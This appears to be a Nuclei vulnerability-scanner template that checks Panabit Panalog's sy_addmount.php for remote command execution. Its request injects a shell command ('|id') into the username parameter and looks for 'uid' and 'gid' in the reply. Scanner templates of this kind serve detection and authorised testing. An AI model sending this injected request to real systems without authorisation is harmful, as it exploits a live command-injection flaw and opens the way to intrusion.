id: Panabit-sy_addmount-rce

info:
  name: Panabit Panalog sy_addmount.php RCE
  author: Str1am
  severity: high
  reference: https://blog.csdn.net/weixin_51387754/article/details/121147617
  tags: Panabit,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/account/sy_addmount.php?username=|id"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "uid"
          - "gid"
        part: body
        condition: and
